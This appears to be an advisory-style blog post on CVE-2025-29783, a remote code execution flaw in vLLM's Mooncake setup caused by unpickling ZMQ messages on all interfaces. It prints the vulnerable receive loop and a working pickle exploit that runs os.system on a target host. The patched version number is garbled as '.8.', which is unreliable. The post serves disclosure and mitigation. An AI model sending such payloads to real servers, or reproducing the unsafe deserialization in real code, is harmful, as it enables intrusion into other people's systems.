CVE-2025-29783 - Remote Code Execution Vulnerability in vLLM using Mooncake Configuration

In this post, we will discuss a critical vulnerability, CVE-2025-29783, affecting vLLM, a high-throughput and memory-efficient inference and serving engine for LLMs (Large Language Models). This vulnerability allows an attacker to execute remote code on distributed hosts when vLLM is configured to use Mooncake, a widely-used key-value (KV) store for distributed systems. We will examine the details of this vulnerability and provide information about how to mitigate it.

Description

vLLM is designed to scale efficiently across multiple machines, making it a popular choice among developers for implementing large-scale language models. One of the key components in this system is the Mooncake KV store, which is responsible for distributing KV pairs across distributed hosts.

CVE-2025-29783 stems from the unsafe deserialization exposed directly over ZMQ/TCP on all network interfaces during the communication process between vLLM and Mooncake. This allows an attacker to send specially crafted messages over the network, leading to remote code execution on the targeted machines.

Exploit Details

To understand the vulnerability better, let's look at a code snippet that shows the unsafe deserialization process in vLLM:

import zmq

# context used for ZMQ communication
context = zmq.Context()

# Mooncake's address for receiving messages
recv_addr = 'tcp://*:8888'

# Create a socket and bind it to the recv_addr
socket_recv = context.socket(zmq.REP)
socket_recv.bind(recv_addr)

while True:
    try:
        # Receive and deserialize the message
        recv_msg = socket_recv.recv_pyobj()
        # Process the message (may lead to remote code execution)
        process_msg(recv_msg)

    except Exception as e:
        # Handle exceptions
        print(f"Error: {e}")

An attacker simply needs to send a malicious payload using Python's pickle library over the ZMQ/TCP connection to execute arbitrary code remotely. Here's an example of an exploit payload:

import zmq
import pickle
import os

# Target vLLM instance's address
target_addr = 'tcp://target.example.com:8888'

# Malicious payload that writes a file with arbitrary content
class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ('echo "You have been hacked" > /tmp/hacked.txt',))

# Serialize the malicious payload
payload = pickle.dumps(MaliciousPayload())

# Send the payload to the target's address
context = zmq.Context()
socket_send = context.socket(zmq.REQ)
socket_send.connect(target_addr)
socket_send.send(payload)

In this example, the malicious payload writes a file with the content "You have been hacked" to the /tmp directory, demonstrating the arbitrary code execution.

Affected Versions

vLLM deployments using Mooncake to distribute KV across distributed hosts are affected by this vulnerability.

Solution

The vulnerability has been patched in vLLM version .8.. We strongly recommend upgrading your vLLM installations to the latest version as soon as possible. The patch ensures that the deserialization process is done securely, closing the attack vector.

Original References

- vLLM GitHub repository
- Mooncake documentation
- CVE-2025-29783 details and mitigation steps

Conclusion

This post discussed CVE-2025-29783, a remote code execution vulnerability affecting vLLM when it is configured to use Mooncake. By understanding the exploit details and how to mitigate the vulnerability, you can ensure that your vLLM deployments are secure against potential attacks.

Timeline

Published on: 03/19/2025 16:15:32 UTC
Last modified on: 03/22/2025 01:15:30 UTC